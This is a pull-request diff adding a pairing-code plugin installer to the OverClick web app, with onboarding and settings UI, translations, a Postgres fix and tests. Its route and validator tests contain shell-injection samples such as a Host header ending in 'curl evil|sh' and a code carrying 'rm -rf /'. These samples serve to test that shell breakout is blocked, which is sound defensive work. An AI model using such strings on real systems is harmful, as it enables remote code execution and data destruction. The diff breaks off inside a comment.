### PR TITLE
[OCL-102] Onboarding offers the plugin, and [OCL-109] pairing works on a real Postgres

### DIFF
--- a/apps/web/src/app/install.sh/route.test.ts
+++ b/apps/web/src/app/install.sh/route.test.ts
@@ -3,13 +3,86 @@ import { resolve } from "node:path";
 import { describe, expect, it } from "vitest";
 import { GET } from "./route";
 
+const canonical = () => readFile(resolve(process.cwd(), "../../install.sh"), "utf8");
+
+function request(url: string, headers: Record<string, string> = {}): Request {
+  return new Request(url, { headers: { host: "board.example", ...headers } });
+}
+
 describe("GET /install.sh", () => {
   it("serves the canonical root installer as shell text", async () => {
-    const response = await GET();
-    const canonical = await readFile(resolve(process.cwd(), "../../install.sh"), "utf8");
+    const response = await GET(request("https://board.example/install.sh"));
 
     expect(response.status).toBe(200);
     expect(response.headers.get("content-type")).toContain("text/x-shellscript");
-    expect(await response.text()).toBe(canonical);
+    expect(await response.text()).toBe(await canonical());
+    expect(response.headers.get("cache-control")).toBe("public, max-age=300");
+  });
+});
+
+describe("GET /install.sh?code=NNNNNN", () => {
+  it("answers the instance and the code the script would otherwise ask for", async () => {
+    const response = await GET(request("https://board.example/install.sh?code=482913"));
+    const body = await response.text();
+
+    expect(body).toContain('OVERCLICK_INSTANCE_URL="${OVERCLICK_INSTANCE_URL:-https://board.example}"');
+    expect(body).toContain('OVERCLICK_PAIRING_CODE="${OVERCLICK_PAIRING_CODE:-482913}"');
+    expect(body).toContain("export OVERCLICK_INSTANCE_URL OVERCLICK_PAIRING_CODE");
+  });
+
+  it("keeps the shebang first, so a saved copy is still executable", async () => {
+    const response = await GET(request("https://board.example/install.sh?code=482913"));
+    const body = await response.text();
+
+    expect(body.split("\n")[0]).toBe("#!/usr/bin/env bash");
+  });
+
+  it("leaves the rest of the installer byte-for-byte alone", async () => {
+    const response = await GET(request("https://board.example/install.sh?code=482913"));
+    const body = await response.text();
+    const original = await canonical();
+
+    // Everything the installer is, minus its shebang, has to survive intact:
+    // the route presents the script, it does not get to rewrite it.
+    expect(body).toContain(original.slice(original.indexOf("\n") + 1));
+  });
+
+  it("never lets a proxy hand the same single-use code to the next caller", async () => {
+    const response = await GET(request("https://board.example/install.sh?code=482913"));
+    expect(response.headers.get("cache-control")).toBe("no-store, private");
+  });
+
+  it("follows the forwarded scheme, because the command it builds is a URL we own", async () => {
+    const response = await GET(
+      request("http://board.example/install.sh?code=482913", { "x-forwarded-proto": "https, http" }),
+    );
+    expect(await response.text()).toContain("https://board.example");
+  });
+
+  it("treats a bare localhost as http, the one case that is not TLS", async () => {
+    const response = await GET(
+      request("http://localhost:3000/install.sh?code=482913", { host: "localhost:3000" }),
+    );
+    expect(await response.text()).toContain("http://localhost:3000");
+  });
+
+  it("ignores anything that is not exactly six digits", async () => {
+    const original = await canonical();
+    for (const code of ["", "12345", "1234567", "abcdef", "12345a", '1"; curl evil #']) {
+      const response = await GET(
+        request(`https://board.example/install.sh?code=${encodeURIComponent(code)}`),
+      );
+      expect(await response.text()).toBe(original);
+    }
+  });
+
+  it("refuses to write a host that could break out of the shell string", async () => {
+    const original = await canonical();
+    const response = await GET(
+      request("https://board.example/install.sh?code=482913", {
+        host: 'board.example";curl evil|sh;#',
+      }),
+    );
+    expect(await response.text()).toBe(original);
   });
 });

--- a/apps/web/src/app/install.sh/route.ts
+++ b/apps/web/src/app/install.sh/route.ts
@@ -1,5 +1,6 @@
 import { readFile } from "node:fs/promises";
 import { resolve } from "node:path";
+import { isPairingCode } from "../../lib/plugin-install";
 
 export const runtime = "nodejs";
 export const dynamic = "force-dynamic";
@@ -11,10 +12,69 @@ async function readInstaller() {
   );
 }
 
-export async function GET() {
-  return new Response(await readInstaller(), {
+/**
+ * A host we are willing to write into a shell script. Everything here ends up
+ * inside double quotes in bash, so the danger is not an odd hostname, it is a
+ * quote or a `$` or a backtick in one. The set below is what a host can
+ * legally contain (name, port, bracketed IPv6) and nothing that can end a
+ * string or start a substitution; anything else means we serve the plain
+ * installer and let it ask.
+ */
+const SAFE_HOST = /^[A-Za-z0-9.\-_:[\]]+$/;
+
+function instanceUrl(request: Request): string | null {
+  const host = request.headers.get("host") ?? new URL(request.url).host;
+  if (!SAFE_HOST.test(host)) return null;
+  // A TLS instance sits behind a proxy that terminates it, so the scheme comes
+  // from the forwarded header; the local case is the only one that is http.
+  const forwarded = request.headers.get("x-forwarded-proto")?.split(",")[0].trim();
+  const proto =
+    forwarded === "http" || forwarded === "https"
+      ? forwarded
+      : host.startsWith("localhost") || host.startsWith("127.0.0.1")
+        ? "http"
+        : "https";
+  return `${proto}://${host}`;
+}
+
+/**
+ * The installer, with the instance and a one-time pairing code already
+ * answered.
+ *
+ * The two values go in as defaults, not as assignments: an operator who
+ * exports OVERCLICK_INSTANCE_URL or OVERCLICK_TOKEN still wins, and the
+ * script's own prompts still run when neither exists. They are inserted after
+ * the shebang rather than before it, so a saved copy stays executable.
+ */
+function withPairing(script: string, url: string, code: string): string {
+  const preamble = [
+    "",
+    "# overclick: this copy was served with a one-time pairing code.",
+    "# The code is six digits, single use, and expires in ten minutes. It is not",
+    "# a token: install.sh trades it on /api/pair for the real one and never",
+    "# prints either. An exported OVERCLICK_TOKEN still takes precedence.",
+    `OVERCLICK_INSTANCE_URL="\${OVERCLICK_INSTANCE_URL:-${url}}"`,
+    `OVERCLICK_PAIRING_CODE="\${OVERCLICK_PAIRING_CODE:-${code}}"`,
+    "export OVERCLICK_INSTANCE_URL OVERCLICK_PAIRING_CODE",
+  ];
+  const lines = script.split("\n");
+  const at = lines[0]?.startsWith("#!") ? 1 : 0;
+  return [...lines.slice(0, at), ...preamble, ...lines.slice(at)].join("\n");
+}
+
+export async function GET(request: Request) {
+  const script = await readInstaller();
+  const code = new URL(request.url).searchParams.get("code");
+  const url = isPairingCode(code) ? instanceUrl(request) : null;
+  const body = url === null || !isPairingCode(code)
+    ? script
+    : withPairing(script, url, code);
+
+  return new Response(body, {
     headers: {
-      "Cache-Control": "public, max-age=300",
+      // A pairing code is single use: a proxy holding this response for five
+      // minutes would serve a spent code to the next person who asks.
+      "Cache-Control": url === null ? "public, max-age=300" : "no-store, private",
       "Content-Disposition": 'inline; filename="install.sh"',
       "Content-Type": "text/x-shellscript; charset=utf-8",
       "X-Content-Type-Options": "nosniff",

--- a/apps/web/src/app/onboarding/wizard.tsx
+++ b/apps/web/src/app/onboarding/wizard.tsx
@@ -5,7 +5,9 @@ import { useEffect, useRef, useState, useTransition } from "react";
 import { saveExecutorsAction } from "../../actions/executors";
 import { saveProjectAction } from "../../actions/onboarding";
 import {
+  createPairingCodeAction,
   createTokenAction,
+  pollPairingAction,
   pollTokenAction,
   workspaceEverConnectedAction,
 } from "../../actions/tokens";
@@ -15,6 +17,10 @@ import {
   ExecutorsGrid,
   type ExecutorSelection,
 } from "../../components/executors-grid";
+import {
+  PluginInstall,
+  type PluginPairing,
+} from "../../components/plugin-install";
 import { dict } from "../../lib/i18n";
 
 type ProjectData = {
@@ -91,6 +97,8 @@ export function Wizard({
   const [label, setLabel] = useState("Claude Code on this machine");
   const [tab, setTab] = useState<string>("claude-code");
   const [token, setToken] = useState<{ id: string; secret: string } | null>(null);
+  const [pairing, setPairing] = useState<PluginPairing | null>(null);
+  const [paired, setPaired] = useState(false);
   const [revealed, setRevealed] = useState(false);
   const [copied, setCopied] = useState(false);
   const [connected, setConnected] = useState(false);
@@ -112,12 +120,30 @@ export function Wizard({
   }, []);
 
   useEffect(() => {
-    if (!token || connected) return;
+    if ((!token && !pairing) || connected) return;
     let stopped = false;
     const check = async () => {
       if (stopped) return;
-      const r = await pollTokenAction(token.id);
-      if (r.used && !stopped) setConnected(true);
+      // The plugin path has two moments worth showing: the installer taking
+      // the code, and the agent making its first call.
+      if (pairing && !paired) {
+        const p = await pollPairingAction(pairing.id);
+        if (p.paired && !stopped) setPaired(true);
+      }
+      if (token) {
+        const r = await pollTokenAction(token.id);
+        if (r.used && !stopped) {
+          setConnected(true);
+          return;
+        }
+      }
+      // The token the installer created belongs to the pairing code, not to
+      // this tab, so "has anything ever reached this workspace" is the only
+      // question the plugin path can honestly ask.
+      if (pairing) {
+        const w = await workspaceEverConnectedAction();
+        if (w.connected && !stopped) setConnected(true);
+      }
     };
     // This step asks the user to leave and paste the command in a terminal;
     // with the tab in the background Chrome throttles setInterval (down to
@@ -136,7 +162,7 @@ export function Wizard({
       document.removeEventListener("visibilitychange", onVisible);
       window.removeEventListener("focus", onVisible);
     };
-  }, [token, connected]);
+  }, [token, pairing, paired, connected]);
 
   const goNext = () =>
     start(async () => {
@@ -163,6 +189,15 @@ export function Wizard({
       const r = await createTokenAction(label);
       if (!r.ok) return setErr(r.error);
       setToken({ id: r.id, secret: r.secret });
+    });
+
+  const genPairing = () =>
+    start(async () => {
+      setErr(null);
+      const r = await createPairingCodeAction(label);
+      if (!r.ok) return setErr(r.error);
+      setPairing({ id: r.id, code: r.code, expiresAt: r.expiresAt });
+      setPaired(false);
     });
 
   const copyCmd = async () => {
@@ -278,60 +313,94 @@ export function Wizard({
             <div className={`wstep${step === 3 ? " active" : ""}`}>
               <h2>{t.wizard.t3Title}</h2>
               <p className="sub">{t.wizard.t3Sub}</p>
-              <div className="field" style={{ maxWidth: 420 }}>
-                <label>{t.wizard.tokenName}</label>
-                <input
-                  className="input"
-                  value={label}
-                  onChange={(e) => setLabel(e.target.value)}
-                  disabled={Boolean(token)}
-                />
-              </div>
-              {!token ? (
-                <button className="btn-next" style={{ marginBottom: 18 }} disabled={pending} onClick={genToken}>
-                  {pending ? t.wizard.generating : t.wizard.generateToken}
-                </button>
-              ) : (
-                <>
-                  <div className="tabs" role="tablist" aria-label={t.wizard.commandTab}>
-                    {CMD_TABS.map((c) => (
-                      <button
-                        key={c.id}
-                        type="button"
-                        role="tab"
-                        aria-selected={tab === c.id}
-                        className={tab === c.id ? "on" : ""}
-                        onClick={() => setTab(c.id)}
-                      >
-                        {c.label}
+
+              {/* The plugin is the path, and it is the path first: everything
+                  the board asks an agent to do (the skill, the hooks, the
+                  /overclick commands) comes with it, and the hand-written MCP
+                  entry below brings none of it. It was the other way round
+                  until OCL-102, which is how the whole 0.2 plugin managed to
+                  ship invisible to the people meant to run it. */}
+              <PluginInstall
+                origin={origin}
+                t={t}
+                label={label}
+                onLabelChange={setLabel}
+                pairing={pairing}
+                onGenerate={genPairing}
+                pending={pending}
+              />
+
+              <details className="alt-path">
+                <summary>{t.plugin.manualCap}</summary>
+                <p className="plug-lead">{t.plugin.manualNote}</p>
+                <div className="field" style={{ maxWidth: 420 }}>
+                  <label>{t.wizard.tokenName}</label>
+                  <input
+                    className="input"
+                    value={label}
+                    onChange={(e) => setLabel(e.target.value)}
+                    disabled={Boolean(token)}
+                  />
+                </div>
+                {!token ? (
+                  <button className="btn-next" style={{ marginBottom: 18 }} disabled={pending} onClick={genToken}>
+                    {pending ? t.wizard.generating : t.wizard.generateToken}
+                  </button>
+                ) : (
+                  <>
+                    <div className="tabs" role="tablist" aria-label={t.wizard.commandTab}>
+                      {CMD_TABS.map((c) => (
+                        <button
+                          key={c.id}
+                          type="button"
+                          role="tab"
+                          aria-selected={tab === c.id}
+                          className={tab === c.id ? "on" : ""}
+                          onClick={() => setTab(c.id)}
+                        >
+                          {c.label}
+                        </button>
+                      ))}
+                    </div>
+                    <div className="cmd">
+                      {commandFor(tab, baseUrl, revealed ? token.secret : maskedSecret)}
+                      <button className={`copy${copied ? " ok" : ""}`} onClick={copyCmd}>
+                        <Icon name={copied ? "check" : "copy"} label={null} size={12} />
+                        {copied ? t.wizard.copied : t.wizard.copy}
                       </button>
-                    ))}
-                  </div>
-                  <div className="cmd">
-                    {commandFor(tab, baseUrl, revealed ? token.secret : maskedSecret)}
-                    <button className={`copy${copied ? " ok" : ""}`} onClick={copyCmd}>
-                      <Icon name={copied ? "check" : "copy"} label={null} size={12} />
-                      {copied ? t.wizard.copied : t.wizard.copy}
-                    </button>
-                  </div>
-                  <div className="tok-note">
-                    {t.wizard.tokNote}{" "}
-                    <span className="reveal" onClick={() => setRevealed(!revealed)}>
-                      {revealed ? t.wizard.hide : t.wizard.reveal}
-                    </span>
-                  </div>
-                </>
-              )}
-              {token ? (
+                    </div>
+                    <div className="tok-note">
+                      {t.wizard.tokNote}{" "}
+                      <span className="reveal" onClick={() => setRevealed(!revealed)}>
+                        {revealed ? t.wizard.hide : t.wizard.reveal}
+                      </span>
+                    </div>
+                  </>
+                )}
+              </details>
+
+              {token || pairing ? (
                 <div className={`conn${connected ? " lit" : ""}`}>
                   <div className="l1">
                     <span className={`pip${connected ? " green" : ""}`} />
-                    <span>{connected ? t.wizard.connected : t.wizard.waiting}</span>
+                    <span>
+                      {connected
+                        ? t.wizard.connected
+                        : paired
+                          ? t.wizard.paired
+                          : t.wizard.waiting}
+                    </span>
                   </div>
                   <div className="l2">
                     {connected ? `${label} · ${t.wizard.justNow}` : t.wizard.pasteCmd}
                   </div>
-                  <div className="cap">{connected ? t.wizard.firstCall : t.wizard.polling}</div>
+                  <div className="cap">
+                    {connected
+                      ? t.wizard.firstCall
+                      : paired
+                        ? t.wizard.pairedCap
+                        : t.wizard.polling}
+                  </div>
                 </div>
               ) : null}
             </div>

--- a/apps/web/src/app/settings/settings-client.tsx
+++ b/apps/web/src/app/settings/settings-client.tsx
@@ -16,6 +16,10 @@ import {
 } from "../../actions/tokens";
 import { saveUpdateModeAction } from "../../actions/updates";
 import { NebulaAtmosphere } from "../../components/nebula-atmosphere";
+import {
+  PluginInstall,
+  type PluginPairing,
+} from "../../components/plugin-install";
 import { UpdatePanel } from "../../components/update-panel";
 import { Wordmark } from "../../components/wordmark";
 import {
@@ -443,19 +447,26 @@ export function SettingsClient({
   };
 
   // ---- pairing code: the token never travels through a chat
-  const [pairFresh, setPairFresh] = useState<{ code: string } | null>(null);
+  //
+  // One state for both surfaces, because the board keeps one live code per
+  // workspace: generating from either place kills the other's code, and two
+  // blocks showing two different sets of six digits, one of them already dead,
+  // is the confusion that costs somebody a terminal round trip.
+  const [pairFresh, setPairFresh] = useState<PluginPairing | null>(null);
   const [pairCopied, setPairCopied] = useState(false);
+  const [machineLabel, setMachineLabel] = useState("");
   const pairCmd = pairFresh
     ? `curl -sX POST ${origin}/api/pair \\\n  -H 'Content-Type: application/json' -d '{"code":"${pairFresh.code}"}'`
     : "";
-  const genPair = () =>
+  const makePairing = (label: string) =>
     start(async () => {
       setErr(null); setMsg(null);
-      const r = await createPairingCodeAction(newLabel || "paired agent");
+      const r = await createPairingCodeAction(label || "paired agent");
       if (!r.ok) return setErr(r.error);
-      setPairFresh({ code: r.code });
-      setNewLabel("");
+      setPairFresh({ id: r.id, code: r.code, expiresAt: r.expiresAt });
     });
+  const genPair = () => makePairing(newLabel);
+  const genPluginPairing = () => makePairing(machineLabel);
   const copyPair = async () => {
     if (!pairFresh) return;
     try {
@@ -888,9 +899,20 @@ export function SettingsClient({
           role="tabpanel"
           aria-labelledby="settab-tokens"
         >
-          <div className="sec-cap" style={{ marginTop: 0 }}>
-            {t.settings.tokensCap}
-          </div>
+          {/* Same offer as onboarding step three, for everyone who already
+              walked past it: the plugin first, the hand-written MCP entry
+              folded away under it (OCL-102). */}
+          <PluginInstall
+            origin={origin}
+            t={t}
+            label={machineLabel}
+            onLabelChange={setMachineLabel}
+            pairing={pairFresh}
+            onGenerate={genPluginPairing}
+            pending={pending}
+          />
+
+          <div className="sec-cap">{t.settings.tokensCap}</div>
           <div className="tok-list">
             {tokens.length === 0 ? (
               <div className="empty-col">{t.settings.tokensEmpty}</div>
@@ -917,6 +939,10 @@ export function SettingsClient({
               ))
             )}
           </div>
+
+          <details className="alt-path">
+          <summary>{t.plugin.manualCap}</summary>
+          <p className="plug-lead">{t.plugin.manualNote}</p>
 
           {fresh ? (
             <div className="fresh-tok">
@@ -987,6 +1013,7 @@ export function SettingsClient({
           <div className="policy-note" style={{ borderTop: 0, paddingTop: 8 }}>
             {t.settings.maskedNote}
           </div>
+          </details>
         </div>
 
         {/* ---- CLAIM LEASE ---- */}

--- a/apps/web/src/components/plugin-install.test.ts
+++ b/apps/web/src/components/plugin-install.test.ts
@@ -1,0 +1,84 @@
+import { createElement } from "react";
+import { renderToStaticMarkup } from "react-dom/server";
+import { describe, expect, it } from "vitest";
+import { dict } from "../lib/i18n";
+import { PluginInstall, type PluginPairing } from "./plugin-install";
+
+const ORIGIN = "https://board.example";
+
+function render(pairing: PluginPairing | null, lang = "en"): string {
+  return renderToStaticMarkup(
+    createElement(PluginInstall, {
+      origin: ORIGIN,
+      t: dict(lang),
+      label: "Claude Code on this machine",
+      onLabelChange: () => {},
+      pairing,
+      onGenerate: () => {},
+      pending: false,
+    }),
+  );
+}
+
+/** A code that is alive for the whole of this test run. */
+function livePairing(): PluginPairing {
+  return {
+    id: "pair-1",
+    code: "482913",
+    expiresAt: new Date(Date.now() + 9 * 60_000).toISOString(),
+  };
+}
+
+describe("the plugin offer", () => {
+  it("leads with the installer command, not with an MCP entry", () => {
+    const html = render(livePairing());
+    expect(html).toContain("/install.sh?code=482913");
+    expect(html).toContain("curl -fsSL");
+    expect(html).not.toContain("mcp add");
+    expect(html).not.toContain("Authorization: Bearer");
+  });
+
+  it("says in one line what the command installs, and on which CLIs", () => {
+    const html = render(null);
+    for (const word of ["MCP", "skill", "hooks", "Claude Code", "Codex", "Grok", "Kimi"]) {
+      expect(html).toContain(word);
+    }
+  });
+
+  it("shows the shape of the command before a code exists, with no code", () => {
+    const html = render(null);
+    expect(html).toContain("/install.sh?code=");
+    expect(html).not.toMatch(/code=\d/);
+  });
+
+  it("offers a fresh command once one exists", () => {
+    expect(render(livePairing())).toContain(dict("en").plugin.regenerate);
+    expect(render(null)).toContain(dict("en").plugin.generate);
+  });
+
+  it("says the code expired instead of offering a dead command", () => {
+    const expired: PluginPairing = {
+      id: "pair-1",
+      code: "482913",
+      expiresAt: new Date(Date.now() - 1000).toISOString(),
+    };
+    const html = render(expired);
+    expect(html).toContain(dict("en").plugin.codeExpired);
+    expect(html).not.toContain("code=482913");
+  });
+
+  it("puts no bearer token on screen in either language", () => {
+    for (const lang of ["en", "pt-BR"]) {
+      const html = render(livePairing(), lang);
+      expect(html).not.toContain("ocb_");
+      expect(html).not.toContain("Bearer");
+    }
+  });
+
+  it("keeps the copy free of the em dash the house style refuses", () => {
+    const t = dict("pt-BR").plugin;
+    for (const line of Object.values(t)) {
+      expect(line).not.toContain("—");
+    }
+  });
+});

--- a/apps/web/src/components/plugin-install.tsx
+++ b/apps/web/src/components/plugin-install.tsx
@@ -1,0 +1,145 @@
+"use client";
+
+import { useEffect, useState } from "react";
+import { Icon } from "./icon";
+import type { Dict } from "../lib/i18n";
+import {
+  formatPairingCountdown,
+  pairingSecondsLeft,
+  pluginInstallCommand,
+  pluginInstallPreview,
+} from "../lib/plugin-install";
+
+export type PluginPairing = { id: string; code: string; expiresAt: string };
+
+/**
+ * The plugin offer: one command, paste-ready, already authenticated (OCL-102).
+ *
+ * This is the main way into the board and it renders in the two places a
+ * person can be when they need it, onboarding step three and Settings, from
+ * the same component so the two cannot drift apart.
+ *
+ * What is on screen is a pairing code, never a token. Six digits, one use, ten
+ * minutes: it survives a screen share, and the installer trades it for the
+ * real bearer value on /api/pair without printing it. The countdown is here
+ * for the same reason a code has a countdown at all, so nobody pastes a
+ * command that is already dead and reads a 404 as "the plugin is broken".
+ *
+ * The parent owns the pairing, because the parent is what polls for the
+ * moment it gets used.
+ */
+export function PluginInstall({
+  origin,
+  t,
+  label,
+  onLabelChange,
+  pairing,
+  onGenerate,
+  pending,
+}: {
+  origin: string;
+  t: Dict;
+  label: string;
+  onLabelChange: (value: string) => void;
+  pairing: PluginPairing | null;
+  onGenerate: () => void;
+  pending: boolean;
+}) {
+  const [copied, setCopied] = useState(false);
+  // Seconds are state, not a render-time read of the clock: a value derived
+  // from Date.now() during render never updates itself, and the whole point of
+  // the number is that it moves.
+  const [left, setLeft] = useState(() =>
+    pairing ? pairingSecondsLeft(pairing.expiresAt, Date.now()) : 0,
+  );
+
+  useEffect(() => {
+    if (!pairing) {
+      setLeft(0);
+      return;
+    }
+    const tick = () => setLeft(pairingSecondsLeft(pairing.expiresAt, Date.now()));
+    tick();
+    const timer = setInterval(tick, 1000);
+    return () => clearInterval(timer);
+  }, [pairing]);
+
+  const live = pairing !== null && left > 0;
+  const command = live
+    ? pluginInstallCommand(origin, pairing.code)
+    : pluginInstallPreview(origin);
+
+  const copy = async () => {
+    if (!live) return;
+    try {
+      await navigator.clipboard.writeText(command);
+      setCopied(true);
+      setTimeout(() => setCopied(false), 2000);
+    } catch {
+      /* clipboard unavailable; the text stays selectable */
+    }
+  };
+
+  return (
+    <div className="plug">
+      <div className="sec-cap" style={{ marginTop: 0 }}>
+        {t.plugin.cap}
+      </div>
+      <p className="plug-lead">{t.plugin.lead}</p>
+
+      <div className="field plug-name">
+        <label htmlFor="plug-label">{t.plugin.nameLabel}</label>
+        <input
+          id="plug-label"
+          className="input"
+          value={label}
+          placeholder={t.plugin.namePlaceholder}
+          onChange={(e) => onLabelChange(e.target.value)}
+          disabled={pending}
+        />
+      </div>
+
+      <div className={`cmd${live ? "" : " ghost"}`}>
+        {command}
+        {live ? (
+          <button
+            type="button"
+            className={`copy${copied ? " ok" : ""}`}
+            onClick={copy}
+          >
+            <Icon name={copied ? "check" : "copy"} label={null} size={12} />
+            {copied ? t.wizard.copied : t.wizard.copy}
+          </button>
+        ) : null}
+      </div>
+
+      <div className="plug-actions">
+        <button
+          type="button"
+          className="btn-new"
+          disabled={pending}
+          onClick={onGenerate}
+        >
+          {pending
+            ? t.wizard.generating
+            : pairing
+              ? t.plugin.regenerate
+              : t.plugin.generate}
+        </button>
+        <span className="plug-state">
+          {live ? (
+            <>
+              {t.plugin.codeLive} <b>{formatPairingCountdown(left)}</b>
+            </>
+          ) : pairing ? (
+            t.plugin.codeExpired
+          ) : (
+            t.plugin.codeWhy
+          )}
+        </span>
+      </div>
+
+      <div className="tok-note">{t.plugin.safety}</div>
+    </div>
+  );
+}

--- a/apps/web/src/lib/i18n.ts
+++ b/apps/web/src/lib/i18n.ts
@@ -294,6 +294,8 @@ const en = {
     connected: "Agent connected.",
     waiting: "Waiting for the first connection…",
     pasteCmd: "Paste the command in your terminal. I'll keep watch.",
+    paired: "Code used. The installer is setting up your CLIs…",
+    pairedCap: "PAIRED ✓",
     justNow: "just now",
     firstCall: "FIRST CALL ✓",
     polling: "POLLING · 2s ⟳",
@@ -302,6 +304,23 @@ const en = {
     seeMyBoard: "See my board",
     finish: "Finish",
     next: "Next",
+  },
+  plugin: {
+    cap: "install the plugin",
+    lead:
+      "One command sets the OverClick plugin up on this machine: MCP access, the board skill, the lifecycle hooks and the /overclick commands, on Claude Code, Codex, Grok and Kimi, whichever of them it finds.",
+    nameLabel: "Name this machine",
+    namePlaceholder: "Claude Code on this machine",
+    generate: "Generate the command",
+    regenerate: "Generate a new command",
+    codeLive: "the code inside it expires in",
+    codeExpired: "the code expired · generate a new command",
+    codeWhy: "the command carries a single-use code, so you never paste a token",
+    safety:
+      "those six digits are a pairing code, not a token: one use, ten minutes, worthless once spent · the installer trades it on /api/pair and never prints the real token",
+    manualCap: "Manual MCP setup (advanced)",
+    manualNote:
+      "The same access with more steps: generate a token and paste the MCP configuration into your CLI by hand. No skill, no hooks, no commands.",
   },
   settings: {
     title: "Settings",
@@ -834,6 +853,8 @@ const ptBR: Dict = {
     connected: "Agente conectado.",
     waiting: "Aguardando a primeira conexão…",
     pasteCmd: "Cole o comando no seu terminal. Eu fico de olho.",
+    paired: "Código usado. O instalador está configurando suas CLIs…",
+    pairedCap: "PAREADO ✓",
     justNow: "agora mesmo",
     firstCall: "PRIMEIRA CHAMADA ✓",
     polling: "POLLING · 2s ⟳",
@@ -842,6 +863,23 @@ const ptBR: Dict = {
     seeMyBoard: "Ver meu board",
     finish: "Concluir",
     next: "Avançar",
+  },
+  plugin: {
+    cap: "instalar o plugin",
+    lead:
+      "Um comando instala o plugin do OverClick nesta máquina: acesso MCP, a skill do board, os hooks de ciclo de vida e os comandos /overclick, no Claude Code, Codex, Grok e Kimi, os que ele encontrar.",
+    nameLabel: "Nome desta máquina",
+    namePlaceholder: "Claude Code nesta máquina",
+    generate: "Gerar o comando",
+    regenerate: "Gerar um novo comando",
+    codeLive: "o código dentro dele expira em",
+    codeExpired: "o código expirou · gere um novo comando",
+    codeWhy: "o comando já vem com um código de uso único, então você nunca cola um token",
+    safety:
+      "esses seis dígitos são um código de pareamento, não um token: valem uma vez, duram dez minutos e não servem pra nada depois de usados · o instalador troca ele em /api/pair e nunca imprime o token real",
+    manualCap: "Configuração MCP manual (avançado)",
+    manualNote:
+      "O mesmo acesso com mais passos: gere um token e cole a configuração MCP na sua CLI na mão. Sem skill, sem hooks, sem comandos.",
   },
   settings: {
     title: "Configurações",

--- a/apps/web/src/lib/pairing.ts
+++ b/apps/web/src/lib/pairing.ts
@@ -74,25 +74,46 @@ export function isValidPairingCodeFormat(code: string): boolean {
  *
  * The window is the code TTL: outside it there was no live code to protect,
  * so the count starts over.
+ *
+ * The two timestamps go in as ISO strings with an explicit cast, and that is
+ * not a style choice (OCL-109). A value handed to `.values()` is mapped by the
+ * column that receives it; a value interpolated into `sql` has no column, so
+ * it reaches the driver as whatever it already was. postgres-js, which is what
+ * production runs, refuses a `Date` in that position and the whole endpoint
+ * answers 500. PGlite, which is what the integration tests run, accepts it,
+ * which is exactly how a green suite shipped a pairing endpoint that could not
+ * pair.
+ *
+ * The statement is built by an exported function for that reason alone: a test
+ * can read the parameters it is about to send without needing the driver that
+ * would have caught them.
  */
-async function spendAttempt(db: McpDatabase, scope: string): Promise<boolean> {
-  const now = new Date();
+export function spendAttemptStatement(
+  db: McpDatabase,
+  scope: string,
+  now: Date,
+) {
   const windowFloor = new Date(now.getTime() - PAIRING_CODE_TTL_MS);
+  const floorParam = sql`${windowFloor.toISOString()}::timestamptz`;
+  const nowParam = sql`${now.toISOString()}::timestamptz`;
 
-  const [row] = await db
+  return db
     .insert(pairingFailure)
     .values({ id: scope, count: 1, windowStartedAt: now })
     .onConflictDoUpdate({
       target: pairingFailure.id,
       set: {
-        count: sql`case when ${pairingFailure.windowStartedAt} < ${windowFloor}
+        count: sql`case when ${pairingFailure.windowStartedAt} < ${floorParam}
           then 1 else ${pairingFailure.count} + 1 end`,
-        windowStartedAt: sql`case when ${pairingFailure.windowStartedAt} < ${windowFloor}
-          then ${now} else ${pairingFailure.windowStartedAt} end`,
+        windowStartedAt: sql`case when ${pairingFailure.windowStartedAt} < ${floorParam}
+          then ${nowParam} else ${pairingFailure.windowStartedAt} end`,
       },
     })
     .returning({ count: pairingFailure.count });
+}
 
+async function spendAttempt(db: McpDatabase, scope: string): Promise<boolean> {
+  const [row] = await spendAttemptStatement(db, scope, new Date());
   return (row?.count ?? 1) <= MAX_PAIRING_FAILURES;
 }
 

--- a/apps/web/src/lib/plugin-install.test.ts
+++ b/apps/web/src/lib/plugin-install.test.ts
@@ -1,0 +1,76 @@
+import { describe, expect, it } from "vitest";
+import {
+  PAIRING_CODE_PLACEHOLDER,
+  formatPairingCountdown,
+  isPairingCode,
+  pairingSecondsLeft,
+  pluginInstallCommand,
+  pluginInstallPreview,
+} from "./plugin-install";
+
+describe("the install command", () => {
+  it("carries the instance and the code, with the URL quoted", () => {
+    expect(pluginInstallCommand("https://board.example", "123456")).toBe(
+      'curl -fsSL "https://board.example/install.sh?code=123456" | sh',
+    );
+  });
+
+  it("does not double the slash when the origin carries one", () => {
+    expect(pluginInstallCommand("https://board.example/", "123456")).toContain(
+      "https://board.example/install.sh",
+    );
+  });
+
+  it("shows the same shape before a code exists, with no code in it", () => {
+    const preview = pluginInstallPreview("https://board.example");
+    expect(preview).toContain(PAIRING_CODE_PLACEHOLDER);
+    expect(preview).not.toMatch(/code=\d/);
+  });
+});
+
+describe("what counts as a pairing code", () => {
+  it("takes exactly six digits", () => {
+    expect(isPairingCode("000000")).toBe(true);
+    expect(isPairingCode("987654")).toBe(true);
+  });
+
+  it("refuses anything else, which is what keeps it out of a shell", () => {
+    for (const value of [
+      "12345",
+      "1234567",
+      "12345a",
+      "",
+      " 123456",
+      "123456\nrm -rf /",
+      '123456"; curl evil',
+      null,
+      undefined,
+      123456,
+    ]) {
+      expect(isPairingCode(value)).toBe(false);
+    }
+  });
+});
+
+describe("how long a code has left", () => {
+  const now = Date.parse("2026-08-20T12:00:00.000Z");
+
+  it("counts whole seconds forward", () => {
+    expect(pairingSecondsLeft("2026-08-20T12:09:58.000Z", now)).toBe(598);
+  });
+
+  it("floors at zero instead of counting down past the expiry", () => {
+    expect(pairingSecondsLeft("2026-08-20T11:59:00.000Z", now)).toBe(0);
+  });
+
+  it("treats an unreadable expiry as already gone", () => {
+    expect(pairingSecondsLeft("not a date", now)).toBe(0);
+  });
+
+  it("reads as a timer", () => {
+    expect(formatPairingCountdown(598)).toBe("9:58");
+    expect(formatPairingCountdown(60)).toBe("1:00");
+    expect(formatPairingCountdown(9)).toBe("0:09");
+    expect(formatPairingCountdown(-5)).toBe("0:00");
+  });
+});

--- a/apps/web/src/lib/plugin-install.ts
+++ b/apps/web/src/lib/plugin-install.ts
@@ -1,0 +1,66 @@
+/**
+ * The one command that installs the OverClick plugin (OCL-102).
+ *
+ * The product built the plugin and then never offered it: onboarding and the
+ * MCP tokens tab handed out the manual MCP configuration, which is the worse
+ * of the two paths, and the installer stayed a thing you had to already know
+ * about. These helpers are the other half of the fix, the half worth testing:
+ * the exact command string the UI shows, and the arithmetic of the code that
+ * makes it work without a token on screen.
+ *
+ * Why a pairing code and not the token: the command has to be paste-ready, and
+ * a bearer token in a copy block is a bearer token on a screen that is being
